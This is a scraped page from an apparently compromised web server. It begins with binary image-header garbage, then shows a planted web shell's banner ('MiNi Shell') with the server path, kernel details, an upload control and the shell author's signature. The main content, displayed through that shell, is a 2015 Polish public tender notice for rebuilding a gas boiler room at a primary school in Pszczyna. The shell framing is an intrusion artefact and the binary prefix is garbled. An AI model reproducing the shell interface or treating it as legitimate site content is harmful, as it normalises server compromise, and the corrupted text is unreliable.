JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150225/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150225/25609-N-2015.html

<p class="kh_header"><b>Pszczyna: Kompleksowa przebudowa  kotłowni gazowej o mocy 284 kW
w Szkole Podstawowej nr 2 w Pszczynie przy ul. Katowickiej 47</b><br>
<b>Numer ogłoszenia: 25609 - 2015; data zamieszczenia: 25.02.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Pszczyński Zarząd Edukacji , ul. Zdrojowa 4 4, 43-200 Pszczyna, woj. śląskie, tel. 032 2102193 w. 116, faks 032 2102193 w. 118.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Kompleksowa przebudowa  kotłowni gazowej o mocy 284 kW
w Szkole Podstawowej nr 2 w Pszczynie przy ul. Katowickiej 47.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zakres zadania:
1.	Roboty budowlane  obejmują 
-  pogłębienie pomieszczeń kotłowni w piwnicy o 35 cm - rozebranie istniejącej posadzki betonowej, wybranie     
    podkładu do żądanej głębokości  ( docelowa wysokość kotłowni 2,20 m)
-  wykonanie nowych warstw pod posadzkę : ubity żwir , chudy beton, 2xpapa na lepiku , styropian  i wylewka 
            betonowa
-  wykonanie schodów  betonowych w korytarzu piwnicy ( zejście do kotłowni)
-   powiększenie okienka piwnicznego wraz z wykonaniem nadproża  z teowników 120 oraz wykonanie 
    studzienki okna  piwnicznego
-   dostawę i wymianę okna z PCV 
-   wykucie istniejących drzwi p.poż na odzysk  i ich ponowne  zabudowanie w nowej  ściance działowej)
-   powiększenie otworu drzwiowego z  montażem drzwi  stalowych przeciwpożarowych   o odporności ogniowej 
    EI30
-   rozebranie ścianki działowej 
-   wykonanie nowej ścianki działowej o grubości 12 cm z montażem drzwi przeciwpożarowych z odzysku
-   wykonanie nowych  fundamentów  pod  kotły c.o.
-  renowację ścian wraz z licowaniem płytkami i malowaniem
-   ułożenie płytek gresowych na posadzce i schodach 
-   przebudowę tylko w niezbędnym zakresie  komina z cegły klinkierowej z kotłowni ponad dachem  ( kolor cegły 
    zbliżony do istniejących 
-   sprawdzenie , odgruzowanie i poszerzenie w razie takiej konieczności  przewodów spalinowych dla wkładów
    kominowych 
-  zabudowanie wkładów kominowych  ze stali nierdzewnej
-  wykonanie wentylacji nawiewno - wywiewnej
-  wykonanie  przejść p.poż. przez przegrody 
-   zabudowanie  umywalki wraz z podejściami
-   zabudowanie grzejnika c.o.
 2. Podbicie betonem ław i ścian fundamentowych odcinkami co 1,0 m z wykonaniem i zasypaniem wykopu 
      z odwozem  nadmiaru ziemi  na odległość do 5 km
      Uwaga: Ilość tych robót zostanie określona w trakcie wykonywania robót - szacowna ilość 19,57 m3. 
                    Rozliczenie nastąpi na podstawie kosztorysu powykonawczego w oparciu o ilość rzeczywiście 
                     wykonanych prac i ceny jednostkowej podanej w ofercie wykonawcy.
 3.   Modernizacja  instalacji elektrycznej  w pomieszczeniu kotłowni   obejmuje:
         -  demontaż  istniejącej instalacji ,
         -   montaż tablicy zasilającej wraz z wyposażeniem 
         -   instalację  zasilania urządzeń  , automatyki i opomiarowania
         -   instalację oświetlenia i gniazd wtykowych 
         -   instalację oświetlenia awaryjnego  
        -    instalację przeciwporażeniową  i aktywnego systemu   bezpieczeństwa instalacji gazowej ,
        -    montaż lamp  oświetleniowych  podstawowych , opraw awaryjnych  , opraw ewakuacyjnych,  gniazd 
             wtykowych   i wyłączników
        -  uruchomienie automatyki
 4. Przebudowa kotłowni gazowej obejmuje:
       -  demontaż starej instalacji i urządzeń 
          Uwaga : Metalowe materiały z rozbiórki jak : kotły , rury , zawory , zbiorniki zostanę zezłomowane przez szkołę.     
          Do obowiązków Wykonawcy należy wszystkie te materiały wynieś z kotłowni i zmagazynować na placu 
          szkolnym. Natomiast urządzenia sterujące ( np. regulatory temperatury , zapłonu itp.) należy przekazać 
          Zamawiającemu.
       -  wykonanie  wewnętrznej instalacji gazowej z rur stalowych bez szwu.
       -  wymianę istniejących kotłów gazowych na kaskadę dwóch kondensacyjnych  kotłów gazowych  mocy 142 kW 
           każdy   wraz z dostawą kotłów
      -   montaż stacji uzdatniania wody
       -  montaż dwóch zasobników cwu wraz z dostawą
       -  dostawę i montaż płytowych wymienników ciepła 
       -  zabudowanie wyposażenia i orurowania technologicznego  kotłowni.
       -  montaż  instalacji  cwu i c.o. wraz z urządzeniami
       -  uruchomienie kotłowni
       -  dostawę i montaż systemu monitoringu , sterowania i zdalnego zarządzania energią 
       -  serwis zamontowanych urządzeń w okresie wskazanym przez wykonawcę
          Wymagania  - serwis powinien obejmować w szczególności :
- okres nie krótszy niż 3 lata
- koszt dojazdu do kotłowni w okresie serwisowania
- naprawę lub wymianę na nowe niesprawnych urządzeń
- długość czasu w jakim zostanie naprawiona usterka  - max - 48 godzin
- zapewnienie urządzeń zastępczych na czas naprawy
- dostarczenie do PZE pok. 115 każdego roku serwisowego do 15 września protokołu z przeglądu rocznego 
  i przygotowania   kotłów c.o. do sezonu grzewczego.
       -  odbiór kominiarski
       -  dokonanie odbioru przez Urząd Dozoru Technicznego
      -   przeszkolenie pracowników szkoły 
      -  wykonanie próby szczelności z regulacją centralnego ogrzewania  w budynku szkoły ,w łączniku  i sali 
         gimnastycznej  z zapleczem
5.   Roboty instalacji hydrantowej obejmują ;
         - przebudowę istniejącego węzła wodomierzowego z wykonaniem  opomiarowania wody na cele  p.poż.
         - montaż rur ocynkowanych  średnicy 50 mm ( przejście przez ścianę kotłowni zabezpieczyć p.poż.)
        -  zabudowanie szafki hydrantowej kompletnej z zaworem hydrantowym o średnicy 25mm , z wężem 
           półsztywnym o długości 30 m
         - wykonanie pomiarów ciśnienia i wydajności hydrantu
        - odbiór przez Przedsiębiorstwo Inżynierii Komunalnej  ( układ pomiarowy)
 6.  Wywóz i utylizacja gruzu i materiałów pochodzących z rozbiórki zgodnie z obowiązującymi przepisami prawa
 7. Uruchomienie istniejącego piecyka gazowego ciepłej wody dla potrzeb kuchni  w okresie przebudowy oraz jego 
     demontaż po  zakończeniu prac.
8.  Zamawiający w własnym zakresie wyposaży kotłownię w drobny sprzęt p.poż.

Szczegółowy zakres zamówienia określają dokumentacja projektowa i specyfikacje techniczne  wykonania i odbioru robót  budowlanych. Zamawiający udostępnia przedmiary robót  jako pomoc dla wykonawcy przy sporządzaniu oferty.

Przed złożeniem oferty Wykonawca powinien zapoznać się z warunkami lokalizacyjno - terenowymi , projektem budowlanym , a w szczególności z zestawieniem materiałowym Tom I pkt. 14 ( technologia kotłowni) i zestawieniem materiałowy Tom II ( branża elektryczna)  i wziąć je pod uwagę przy sporządzaniu oferty.

Jeżeli Wykonawca chce wykonać modernizację kotłowni z urządzeń równoważnych   do urządzeń zastosowanych w projekcie powinien załączyć w ofercie zgodę projektanta na tę zamianę wraz z jego oświadczeniem , że proponowane urządzenia są  równoważne z zaprojektowanymi.

Zamawiający zapewni Wykonawcy możliwość korzystania z energii elektrycznej i wody. Wykonawca z tego tytułu poniesie zryczałtowane koszty w wysokości : 
    -   za energię elektryczną -    250,00 zł.  ( słownie: dwieście  pięćdziesiąt złotych /00 groszy)
    -   za wodę  - 250,00 zł. ( słownie :   dwieście pięćdziesiąt złotych  / 00 groszy).</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>art.67 ust. 1 pkt 6</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.33.30.00-0, 45.33.10.00-6, 45.33.00.00-9, 45.31.00.00-3, 45.45.30.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.08.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wadium w wysokości :8 000,00zł słownie : osiem tysięcy złotych 
       należy wnieść w terminie    do  23.03.2015 r.  przed upływem terminu składania ofert.
       Wadium w  formie innej niż pieniądz,  dopuszczonej art.45 ust 6  Prawa zamówień publicznych (Dz.U.2014  
        poz.1232). należy złożyć w formie oryginału  w kasie PZE, czynnej :  
                                                            w godz.    7:00  - 14:00  ( środa i piątek )
			                 w godz.   12:00  - 14:00 (wtorek)
     Gwarancja zapłaty wadium winna  być  bezwarunkowa i płatna na pierwsze żądanie.
     Wadium wniesione w pieniądzu należy wpłacić przelewem  na  konto  :
      ING Bank Śląski o/Pszczyna - Pszczyński Zarząd Edukacji - nr 80 1050 1070 1000 0090 3028 5937
      Potwierdzeniem dokonania wpłaty wadium jest uznanie kwotą wadium rachunku Zamawiającego ( wpływ środków 
      na rachunek   Zamawiającego przed upływem terminu składania ofert).</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>spełnia - nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">inne dokumenty</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>wykażą się doświadczeniem w wykonywaniu podobnych robót do przedmiotu zamówienia - za  spełnienie tego  warunku zamawiający  uzna  doświadczenie  w wykonaniu przynajmniej dwóch   zadań związanych   z wykonaniem  kotłowni o mocy min 280 kW w zakresie:  -  robót budowlanych ,   -  robót instalacyjnych  -  robót elektrycznych,       
o  wartościach  zbliżonych  do   przedmiotowego  zadania   w  okresie  5 lat    przed dniem    wszczęcia postępowania o udzielenie  zamówienia, a jeżeli okres  prowadzenia działalności jest  krótszy   -  w tym  okresie.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 79</li>
<li>2 - cena jednostkowa podbicia betonem - 6</li>
<li>3 - gwarancja na roboty i materiały wraz z serwisem urządzeń 1 pkt- za 3 lata , 5 pkt. - za 4 lata, 10 pkt za 5 lat - 15</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje zmiany umowy w przypadkach:
1.	 Zmian organizacyjnych stron np.; zmiana reprezentacji lub siedziby strony.
2.	Zmiany osób stron odpowiedzialnych za realizację umowy na inne osoby legitymujące się co najmniej równoważnymi uprawnieniami.
3.	Zamawiający przewiduje możliwość zmiany umowy , w przypadku gdy nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie  podatku VAT .
4.	Wszystkie powyższe postanowienia stanowią katalog zmian , na które zamawiający może wyrazić zgodę..</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> pze.bip.net.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Pszczyński Zarząd Edukacji
43-200 Pszczyna, ul. Zdrojowa 4 (woj. śląskie)
tel. (32) 210 21 93   wew.115    fax. wew. 118
pokój 115.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.03.2015 godzina 11:00, miejsce: Pszczyński Zarząd Edukacji
43-200 Pszczyna, ul. Zdrojowa 4 (woj. śląskie)
tel. (32) 210 21 93   wew.115    fax. wew. 118
pokój 103.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com